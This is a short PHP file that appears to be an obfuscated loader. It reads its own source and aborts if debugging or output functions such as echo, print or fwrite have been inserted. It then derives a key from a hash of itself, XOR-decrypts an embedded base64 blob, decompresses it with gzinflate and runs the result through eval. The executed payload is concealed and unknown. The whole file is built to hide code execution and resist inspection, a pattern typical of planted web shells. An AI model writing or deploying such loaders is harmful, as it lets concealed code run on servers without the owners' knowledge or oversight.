<?php
$cplflbxlo="66af3099a93ace0b163c9c369c03b1d0";
$knfxwjdipi="020556075200090e070e0251075604010901045a5b070a570f50055754020607";
$zntuliqhduc="qXzma6MAPMvzCyXi7UcrU1x4Ob2bY3t5bZmwCh2uMXbC3JFBpFcvdaRqQ0c1PPOsywsHJSLpkLYDk0KvKxgyvliveIWB0uS6ynTVGyE9iohhVE7oBMNzvTV5JFGRxSpjIFM3Klr3RRPyblQnpX6MZilAIY13Cdv2jh4P///GeevgyGKXUmrxMYogz9GavaC9w5HvBw==";
$qtomluj=file_get_contents(__FILE__);
$veuscb=str_replace($zntuliqhduc,"",$qtomluj);
if(strpos($veuscb,"ec"."ho")!==false||strpos($veuscb,"pr"."int")!==false||strpos($veuscb,"var_"."dump")!==false||strpos($veuscb,"file_put_"."contents")!==false||strpos($veuscb,"fw"."rite")!==false){die();}
$pqpjykxvdl=str_replace(array($cplflbxlo,$knfxwjdipi),array("SP_7a209697","KP_44647f5c"),$qtomluj);
$epsvwwifv=md5($pqpjykxvdl);
$czfrhgjpocvn=hex2bin($knfxwjdipi);
$sgpbussfhuv="";
$elmcnliefc=strlen($epsvwwifv);
for($kpfjxmynybgh=0;$kpfjxmynybgh<$elmcnliefc;$kpfjxmynybgh++){
    $sgpbussfhuv.=chr(ord($czfrhgjpocvn[$kpfjxmynybgh])^ord($epsvwwifv[$kpfjxmynybgh]));
}
$concasnqfs=base64_decode($zntuliqhduc);
$tmhtlxrh=strlen($concasnqfs);
$jkcpdv="";
$jvrajyncls=strlen($sgpbussfhuv);
for($kpfjxmynybgh=0;$kpfjxmynybgh<$tmhtlxrh;$kpfjxmynybgh++){
    $jkcpdv.=$concasnqfs[$kpfjxmynybgh]^$sgpbussfhuv[$kpfjxmynybgh%$jvrajyncls];
}
$bsbbblogp="gz"."in"."fl"."ate";
eval($bsbbblogp($jkcpdv));
